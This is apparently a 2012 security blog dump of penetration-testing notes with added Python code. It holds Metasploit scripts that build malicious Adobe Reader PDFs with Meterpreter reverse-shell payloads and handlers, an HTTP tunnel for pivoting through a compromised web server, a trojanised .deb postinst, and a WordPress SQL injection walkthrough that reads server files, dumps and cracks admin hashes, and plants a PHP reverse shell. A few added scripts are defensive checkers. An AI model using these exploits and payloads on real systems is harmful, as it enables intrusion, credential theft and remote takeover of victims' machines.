blog_view_all_20120806

http://x73.cc/how-to-metasploit-db_autopwn-with-postgresql.html

http://zhaoxiaobu.blog.51cto.com/878176/d-5

http://hi.baidu.com/664169240/blog/index/1


Posted in Uncategorized | Comments Off on blog_view_all_20120806

something_may_future_use_20120806

http://www.lengmo.net/post/1293/#entrymore

Intranet penetration tool: reDuh (webshell pivot), short usage notes

This tool forwards ports of servers inside the internal network to the local machine through an HTTP/HTTPS tunnel, forming a connected loop. It is used to reach ports that are open only internally on a target server when the target sits on an internal network or is behind a port-filtering policy: the attacker talks HTTP to a small webshell stub on the compromised web server, and the stub opens the real TCP connections on the inside.
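The mechanism described above, as an added Python example (not reDuh's own Java client or JSP/PHP/ASPX stub, and a JSON-over-POST wire format of our own): one half stands in for the stub on the pivot host and owns the real sockets, the other half runs on the attacker's machine and only ever speaks HTTP. The echo service, host names and ports are constructed for the demo.

```python
"""Minimal reDuh-style TCP-over-HTTP tunnel (added example, not reDuh's code)."""
import base64
import json
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import Request, urlopen

# ---- pivot half: stands in for the reDuh stub on the compromised web server
_sessions = {}              # session id -> socket into the internal network
_lock = threading.Lock()


class TunnelHandler(BaseHTTPRequestHandler):
    """One HTTP POST per tunnel action: connect / send / recv (our own format)."""

    def log_message(self, *args):   # silence request logging for the demo
        pass

    def do_POST(self):
        req = json.loads(self.rfile.read(int(self.headers["Content-Length"])))
        cmd = req.get("cmd")
        if cmd == "connect":        # open a TCP socket to an internal host:port
            sock = socket.create_connection((req["host"], req["port"]), timeout=2)
            sock.settimeout(0.2)    # recv must not block the HTTP worker
            with _lock:
                sid = str(len(_sessions) + 1)
                _sessions[sid] = sock
            resp = {"sid": sid}
        elif cmd == "send":         # bytes from the attacker -> internal service
            _sessions[req["sid"]].sendall(base64.b64decode(req["data"]))
            resp = {}
        elif cmd == "recv":         # bytes from the internal service -> attacker
            try:
                data = _sessions[req["sid"]].recv(4096)
            except socket.timeout:
                data = b""
            resp = {"data": base64.b64encode(data).decode()}
        else:
            resp = {"error": "unknown cmd"}
        body = json.dumps(resp).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


# ---- attacker half: only ever speaks HTTP to the pivot
class TunnelClient:
    def __init__(self, url):
        self.url = url

    def _call(self, **payload):
        req = Request(self.url, data=json.dumps(payload).encode(),
                      headers={"Content-Type": "application/json"})
        with urlopen(req, timeout=5) as resp:
            return json.loads(resp.read())

    def connect(self, host, port):
        return self._call(cmd="connect", host=host, port=port)["sid"]

    def send(self, sid, data):
        self._call(cmd="send", sid=sid, data=base64.b64encode(data).decode())

    def recv(self, sid, attempts=25):
        """Poll the pivot until the internal service has answered."""
        for _ in range(attempts):
            data = base64.b64decode(self._call(cmd="recv", sid=sid)["data"])
            if data:
                return data
        return b""


def _start_echo_service():
    """Constructed stand-in for an internal-only TCP service: echoes one message."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(conn.recv(4096))
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo(message=b"hello through the tunnel"):
    """Run pivot, service and client in one process; return what came back."""
    internal_port = _start_echo_service()
    pivot = HTTPServer(("127.0.0.1", 0), TunnelHandler)
    threading.Thread(target=pivot.serve_forever, daemon=True).start()
    client = TunnelClient("http://127.0.0.1:%d/" % pivot.server_port)
    sid = client.connect("127.0.0.1", internal_port)
    client.send(sid, message)
    reply = client.recv(sid)
    pivot.shutdown()
    return reply


if __name__ == "__main__":
    print(demo())
```

Every byte of the inner TCP stream crosses the perimeter inside ordinary HTTP requests and responses, which is why a firewall that only permits 80/443 to the web server does not stop it; the defender's handle on this is the web server's access log, where the stub shows up as a burst of small POSTs to one URL.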


Posted in Uncategorized | Comments Off on something_may_future_use_20120806

video-evil_deb

Video already uploaded to Dropbox.

You can replace any *.deb with a trojanised copy; the original (source) *.deb is what gets swapped out.

Most importantly, many Linux users run no anti-virus at all, so nothing on the box looks inside the package before dpkg installs it.
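What makes a trojanised .deb work, and the check to run before installing one, as an added Python example (not from the video, and not dpkg's own code): a .deb is an ar archive holding debian-binary, control.tar.* and data.tar.*, and the maintainer scripts inside control.tar (preinst, postinst, prerm, postrm) are executed as root by dpkg. The parser below uses only the standard library; the demo package, its name and the postinst payload are constructed here and are not real.

```python
"""List the maintainer scripts inside a .deb (added example)."""
import io
import tarfile

MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")


def ar_members(blob):
    """Parse an 'ar' archive as written by dpkg-deb: {member name: bytes}."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    pos, members = 8, {}
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]           # 60-byte member header
        if hdr[58:60] != b"`\n":
            raise ValueError("bad ar member header at offset %d" % pos)
        name = hdr[0:16].decode().rstrip(" ").rstrip("/")
        size = int(hdr[48:58].decode())
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size & 1)      # members are 2-byte aligned
    return members


def maintainer_scripts(deb):
    """Return {script name: text} for every maintainer script in the .deb."""
    members = ar_members(deb)
    control = next((v for k, v in members.items()
                    if k.startswith("control.tar")), None)
    if control is None:
        raise ValueError("no control.tar member")
    found = {}
    # "r:*" handles .gz/.xz/.bz2 control tarballs; zstd needs an external tool
    with tarfile.open(fileobj=io.BytesIO(control), mode="r:*") as tar:
        for m in tar.getmembers():
            base = m.name.rsplit("/", 1)[-1]
            if base in MAINTAINER_SCRIPTS and m.isfile():
                found[base] = tar.extractfile(m).read().decode(errors="replace")
    return found


# ---- demo package construction (invented package, not a real one) ----------
def _ar_member(name, data):
    hdr = (name.ljust(16) + "0".ljust(12) + "0".ljust(6) + "0".ljust(6)
           + "100644".ljust(8) + str(len(data)).ljust(10) + "`\n").encode()
    return hdr + data + (b"\n" if len(data) & 1 else b"")


def _tar_gz(files):
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo("./" + name)
            info.size = len(content)
            info.mode = 0o755
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def build_demo_deb(postinst=None):
    control = (b"Package: demo-pkg\nVersion: 1.0\nArchitecture: all\n"
               b"Maintainer: demo\nDescription: demo\n")
    files = {"control": control}
    if postinst is not None:
        files["postinst"] = postinst
    return (b"!<arch>\n"
            + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", _tar_gz(files))
            + _ar_member("data.tar.gz", _tar_gz({})))


# What a trojanised package carries: anything here runs as root on install.
EVIL_POSTINST = (b"#!/bin/sh\n"
                 b"echo 'ran as root at install time' > /tmp/evil_deb_marker\n"
                 b"exit 0\n")

if __name__ == "__main__":
    for name, text in maintainer_scripts(build_demo_deb(EVIL_POSTINST)).items():
        print("==", name, "==")
        print(text)
```

Running this against a package from an untrusted source before `dpkg -i` shows exactly what will execute as root; a package that has no business carrying a postinst, or one whose scripts reach for the network, is the tell.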

Posted in Uncategorized | Comments Off on video-evil_deb

Windows/fileformat/adobe_cooltype_sing

Vulnerability Reference

CVE-2010-2883

OSVDB-67849

Attacker Info:

OS: BackTrack 5 R2

Metasploit version:

Framework: 4.4.0-dev.15637

Console  : 4.4.0-dev.15613

Victim Info:

OS: Windows XP SP3

Adobe Reader: 9.0 (English)

Step:

1. Craft a malicious PDF file and deliver it to the victim.

==================Exploit.rc======================

use exploit/windows/fileformat/adobe_cooltype_sing

set LHOST 192.168.100.230

set FILENAME cootype_sing.pdf

set payload windows/meterpreter/reverse_tcp

exploit

============================================

2. Start the handler

Listen on port 4444 (the payload's default LPORT, since the rc above does not change it).

=======================get_meterpreter.rc============

use multi/handler

set LHOST 192.168.100.230

set payload windows/meterpreter/reverse_tcp

show options

exploit

====================================

3. Wait for the victim to open the PDF.

4. Success: the reverse Meterpreter session comes back to the handler on port 4444.
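Added example, not part of the original post or of the Metasploit module: what the module above actually exploits. CVE-2010-2883 is a stack buffer overflow in CoolType.dll (Reader/Acrobat 9.x before 9.4 and 8.x before 8.2.5): the SING table's uniqueName field is copied with strcat into a fixed-size stack buffer on the assumption that it is NUL-terminated within its 28 bytes, and the malicious PDF embeds a TrueType font whose uniqueName is not. This script parses the sfnt table directory, finds the SING table and checks that invariant, which is the triage test for a font pulled out of a suspicious PDF. The header layout is Adobe's published SING glyphlet table; both sample fonts are constructed here.

```python
"""Flag TrueType fonts whose SING uniqueName is not NUL-terminated (added example)."""
import struct

SING_UNIQUENAME_OFF = 16    # eight USHORT header fields precede uniqueName
SING_UNIQUENAME_LEN = 28    # uniqueName[28], NUL-terminated per the SING spec


def sfnt_tables(font):
    """Return {tag: bytes} from the sfnt table directory of a TrueType font."""
    if len(font) < 12:
        raise ValueError("too short for an sfnt header")
    num_tables = struct.unpack(">H", font[4:6])[0]
    tables = {}
    for i in range(num_tables):
        rec = font[12 + 16 * i:28 + 16 * i]
        if len(rec) < 16:
            raise ValueError("truncated table directory")
        tag, _checksum, offset, length = struct.unpack(">4sIII", rec)
        if offset + length > len(font):
            raise ValueError("table %r points outside the file" % tag)
        tables[tag] = font[offset:offset + length]
    return tables


def sing_unique_name_is_safe(sing):
    """True only if uniqueName carries a NUL inside its 28-byte field."""
    field = sing[SING_UNIQUENAME_OFF:SING_UNIQUENAME_OFF + SING_UNIQUENAME_LEN]
    return len(field) == SING_UNIQUENAME_LEN and b"\x00" in field


def check_font(font):
    """Return 'no-sing', 'ok' or 'suspicious' for one font blob."""
    tables = sfnt_tables(font)
    if b"SING" not in tables:
        return "no-sing"
    return "ok" if sing_unique_name_is_safe(tables[b"SING"]) else "suspicious"


# ---- constructed demo inputs ------------------------------------------------
def make_sing(unique_name):
    """SING header: 8 USHORTs, uniqueName[28], METAMD5[16], nestLevel."""
    fields = struct.pack(">8H", 1, 0, 1, 0, 0, 1000, 0, 0)
    return fields + unique_name.ljust(28, b"\x00")[:28] + b"\x00" * 16 + b"\x00"


def build_font(sing_table):
    """Minimal sfnt container with a single SING table."""
    header = struct.pack(">IHHHH", 0x00010000, 1, 16, 0, 0)   # 1 table
    record = struct.pack(">4sIII", b"SING", 0, 12 + 16, len(sing_table))
    return header + record + sing_table


BENIGN_FONT = build_font(make_sing(b"glyphlet.example"))
EVIL_FONT = build_font(make_sing(b"A" * 28))   # 28 bytes, no terminator

if __name__ == "__main__":
    print("benign:", check_font(BENIGN_FONT))
    print("evil:  ", check_font(EVIL_FONT))
```

The exploit PDF embeds the font as a FontFile2 stream, normally Flate-compressed, so decompress the stream first and hand the raw sfnt to `check_font`. A font with a SING table at all is unusual enough in e-mail attachments to be worth a look on its own.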

Posted in Uncategorized | Comments Off on Windows/fileformat/adobe_cooltype_sing

windows/fileformat/adobe_utilprint


This PoC was written for educational purposes only.

Use it at your own risk; the author is not responsible for any misuse.

=========================================

attacker machine: bt5 r2

victim: win xp sp3 (Chinese)

=================rc========================

use exploit/windows/fileformat/adobe_utilprint
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.94.128
set lport 777
set filename oh.pdf
show options
exploit

===================  multi.rc=================

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.94.128
set lport 777
show options
exploit -j

===================================

The handler's LHOST/LPORT must match what was baked into the PDF (192.168.94.128:777); exploit -j keeps the handler running as a background job so the console stays usable. The generated PDF is written to ~/.msf4/local/oh.pdf.

exploit info: run the rc, then deliver oh.pdf to the victim

victim machine: open oh.pdf in Adobe Reader

back to the attacker machine: the reverse Meterpreter session arrives at the handler

Success!

Posted in Uncategorized | Comments Off on windows/fileformat/adobe_utilprint

windows/fileformat/adobe_libtiff


This PoC was written for educational purposes only.

Use it at your own risk; the author is not responsible for any misuse.

=========================================

attacker machine: bt5 r2

victim: win xp sp3 (Chinese)
=================rc========================

use exploit/windows/fileformat/adobe_libtiff
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.94.128
set lport 777
set filename oh.pdf
show options
exploit

===========multi.rc ================

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.94.128
set lport 777
show options
exploit -j

===================================

Same pattern as above: the handler's LHOST/LPORT must match what the PDF connects back to, and exploit -j backgrounds the handler.

exploit info: run the rc, then deliver oh.pdf to the victim

victim machine: open oh.pdf in Adobe Reader

back to the attacker machine: the reverse Meterpreter session arrives at the handler

Success!

Posted in Uncategorized | Comments Off on windows/fileformat/adobe_libtiff

exploit/windows/fileformat/adobe_jbig2decode


This PoC was written for educational purposes only.

Use it at your own risk; the author is not responsible for any misuse.

=========================================

attacker machine: bt5 r2

victim: bt5 r2 (sic; this module targets Adobe Reader on Windows, so the victim must actually be a Windows box running a vulnerable Reader)

==================rc =======================

use exploit/windows/fileformat/adobe_jbig2decode
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.94.128
set lport 777
set filename oh.pdf
show options
exploit

===================multi .rc ======

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.94.128
set lport 777
show options
exploit -j

===================================

exploit info: run the rc, then deliver oh.pdf to the victim

victim machine: open oh.pdf in Adobe Reader

back to the attacker machine: the reverse Meterpreter session arrives at the handler

Success!

Posted in Uncategorized | Comments Off on exploit/windows/fileformat/adobe_jbig2decode

exploit/windows/fileformat/adobe_geticon


This PoC was written for educational purposes only.

Use it at your own risk; the author is not responsible for any misuse.

=========================================

attacker machine: bt5 r2

victim: bt5 r2 (sic; this module targets Adobe Reader on Windows, so the victim must actually be a Windows box running a vulnerable Reader)

===================rc ======================

use exploit/windows/fileformat/adobe_geticon
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.94.128
set lport 777
set filename oh.pdf
show options
exploit

=====================  meterpreter.rc ==========

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.94.128
set lport 777
show options
exploit -j

===================================

exploit info: run the rc, then deliver oh.pdf to the victim

victim machine: open oh.pdf in Adobe Reader

back to the attacker machine: the reverse Meterpreter session arrives at the handler

Success!

Posted in Uncategorized | Comments Off on exploit/windows/fileformat/adobe_geticon

exploit/windows/fileformat/adobe_collectemailinfo


This PoC was written for educational purposes only.

Use it at your own risk; the author is not responsible for any misuse.

=========================================

attacker machine: bt5 r2

victim: bt5 r2 (sic; this module targets Adobe Reader on Windows, so the victim must actually be a Windows box running a vulnerable Reader)

====================  rc =====================

use exploit/windows/fileformat/adobe_collectemailinfo
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.94.128
set lport 777
set filename oh.pdf
show options
exploit

===================    meterpreter.rc =============

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.94.128
set lport 777
show options
exploit -j

===================================

exploit info: run the rc, then deliver oh.pdf to the victim

victim machine: open oh.pdf in Adobe Reader

back to the attacker machine: the reverse Meterpreter session arrives at the handler

Success!

Posted in Uncategorized | Comments Off on exploit/windows/fileformat/adobe_collectemailinfo

WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit

Video already uploaded to Dropbox.

/////////////////////////////////////
admin
4debb7

cd /pentest/web/wpscan/

./wpscan.rb --url http://192.168.94.128/wordpress

///////// union-based injection in the cat parameter: find the column count, then put expressions in the column the page echoes back

http://192.168.94.128/wordpress/index.php?cat=0 union select 1,2,3,4,5

http://192.168.94.128/wordpress/index.php?cat=0 union select 1,version(),3,4,5

http://192.168.94.128/wordpress/index.php?cat=0 union select 1,user(),3,4,5

http://192.168.94.128/wordpress/index.php?cat=0 union select 1,database(),3,4,5

///////// this form does not work: load_file() needs a string, and quote characters are not usable in this parameter, so encode the path as a MySQL hex literal instead

http://192.168.94.128/wordpress/index.php?cat=0 union select 1,load_file(/etc/passwd),3,4,5

root@bt:~# echo -n /etc/passwd | xxd -p -
2f6574632f706173737764

/////// add 0x

http://192.168.94.128/wordpress/index.php?cat=0 union select 1,load_file(0x2f6574632f706173737764),3,4,5

///////// read /etc/passwd with sqlmap (load_file() needs the MySQL FILE privilege, so this only works because the web app's database user has it)

./sqlmap.py --url=http://192.168.94.128/wordpress/index.php?cat=0 --file-read=/etc/passwd

cat /pentest/database/sqlmap/output/192.168.94.128/files/_etc_passwd

///////////////////////////////////////////////////////////////////
/////////////////////////////////////////////
///////// dump the MySQL user password hashes
./sqlmap.py --url=http://192.168.94.128/wordpress/index.php?cat=0 --passwords -v 0

///////// MySQL 4.1+ hashes are SHA1(SHA1(password)); john's mysql-sha1 format expects them with the leading asterisk, as MySQL prints them

echo '*9CFBBC772F3F6C106020035386DA5BBBF1249A11' > /tmp/mysql

cat /pentest/database/sqlmap/output/192.168.94.128/files/_etc_passwd

////////// locate the WordPress directory

locate httpd.conf

./sqlmap.py --url=http://192.168.94.128/wordpress/index.php?cat=0 --file-read=/etc/apache2/httpd.conf

///////// not on this target; try the other common location

./sqlmap.py --url=http://192.168.94.128/wordpress/index.php?cat=0 --file-read=/etc/httpd/conf/httpd.conf

///////// we guess the dir is /var/www/wordpress

./sqlmap.py --url=http://192.168.94.128/wordpress/index.php?cat=0 --file-read=/var/www/wordpress/wp-config.php

cat /pentest/database/sqlmap/output/192.168.94.128/files/_var_www_wordpress_wp-config.php

///////// wp-config.php holds the database password in clear (toor here); confirm it matches the dumped hash

echo toor > /tmp/mysql_password

cd /pentest/passwords/john/

john /tmp/mysql --wordlist=/tmp/mysql_password --format=mysql-sha1
////////////////////////////////////////////////////////

//////// crack the WordPress usernames and passwords

http://wordpress.org

////search database descript

http://codex.wordpress.org/Database_Description/1.5#Table:_wp_users

////////// 0x3a is ':' (ASCII 58), used as a field separator inside concat() so login and hash come back as one string
http://192.168.94.128/wordpress/index.php?cat=0 union select 1,concat(user_login,0x3a,user_pass),3,4,5 from wp_users

curl --silent 'http://192.168.94.128/wordpress/index.php?cat=0%20union%20select%201,concat%28user_login,0x3a,user_pass%29,3,4,5%20from%20wp_users' | grep pagetitle | sed 's/.*;\(.*\)&.*/\1/'

///////// the page shows one row per request, so walk the user IDs and pull login, hash and user_level (10 is the administrator)

for x in $(seq 1 6); do curl --silent "http://192.168.94.128/wordpress/index.php?cat=0%20union%20select%201,concat%28user_login,0x3a,user_pass,0x3a,user_level%29,3,4,5%20from%20wp_users%20where%20ID=$x" | grep pagetitle | sed 's/.*;\(.*\)&.*/\1/'; done

///////// save the login:hash lines, then crack them (WordPress 1.5 stores plain, unsalted MD5)

gedit /tmp/wp

john /tmp/wp --wordlist=/opt/metasploit/apps/pro/msf3/data/john/wordlists/password.lst --format=raw-md5

cat john.pot

cat /tmp/wp

//////// log in as the cracked admin and get a reverse shell

cat /pentest/backdoors/web/webshells/php-reverse-shell.php

/// replace lhost and lport with our address and listening port

nc -lvvp 777

///////// upload the shell through the admin panel, then request it from the plugins directory

http://192.168.94.128/wordpress/wp-content/plugins/
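The union-injection steps above, as an added Python helper (not the post's code): it builds the cat= payloads the post types by hand, using 0x.. hex literals so no quote characters are needed, pulls the injected column back out of the response the same way the post's sed does, and checks the WordPress 1.5 MD5 hashes against a wordlist. Host, path and column count come from the post; the response fragment and the hash (md5 of "admin") are constructed for the demo.

```python
"""Union-injection helpers for the WordPress <= 1.5.1.1 walkthrough (added example)."""
import hashlib
import re
from urllib.parse import quote

TARGET = "http://192.168.94.128/wordpress/index.php"   # from the post
NCOLS = 5          # the 'union select 1,2,3,4,5' probe above matched 5 columns
SHOW_COL = 2       # column 2 is the one the page echoes in its heading


def hex_literal(text):
    """MySQL 0x.. string literal: load_file(0x2f65...) needs no quotes."""
    return "0x" + text.encode().hex()


def union_payload(expr, table=None, where=None):
    """Build the cat= value: '0 union select 1,<expr>,3,4,5 [from t [where w]]'."""
    cols = [str(i) for i in range(1, NCOLS + 1)]
    cols[SHOW_COL - 1] = expr
    sql = "0 union select " + ",".join(cols)
    if table:
        sql += " from " + table
    if where:
        sql += " where " + where
    return sql


def injection_url(expr, table=None, where=None):
    return TARGET + "?cat=" + quote(union_payload(expr, table, where), safe="(),=")


# Same capture as the post's sed 's/.*;\(.*\)&.*/\1/': the text between the
# entity terminator ';' before the value and the '&' of the entity after it.
_PAGETITLE = re.compile(r".*;(.*)&.*")


def extract_injected(html):
    """Return the injected value from every line carrying the pagetitle heading."""
    out = []
    for line in html.splitlines():
        if "pagetitle" in line:
            m = _PAGETITLE.match(line)
            if m:
                out.append(m.group(1))
    return out


def parse_user_rows(values):
    """Split 'login:hash:level' strings (0x3a separators) into tuples."""
    return [tuple(v.split(":")) for v in values]


def crack_md5(digest, wordlist):
    """WordPress 1.5 stores md5(password) unsalted: try each candidate word."""
    digest = digest.lower()
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


# Constructed response fragment, modelled on the heading line the post greps for.
SAMPLE_PAGE = """<html><head><title>demo</title></head><body>
<h2 class="pagetitle">Archive for the &#8216;admin:21232f297a57a5a743894a0e4a801fc3:10&#8217; Category</h2>
</body></html>"""

if __name__ == "__main__":
    print(injection_url("load_file(%s)" % hex_literal("/etc/passwd")))
    print(injection_url("concat(user_login,0x3a,user_pass,0x3a,user_level)",
                        "wp_users", "ID=1"))
    for login, pw_hash, level in parse_user_rows(extract_injected(SAMPLE_PAGE)):
        print(login, level, crack_md5(pw_hash, ["123456", "admin", "password"]))
```

The hex-literal trick is the part worth remembering: it sidesteps quote filtering and magic_quotes-style escaping entirely, which is why a WAF rule that only watches for `'` misses this whole class of request.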

Posted in Uncategorized | Comments Off on WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit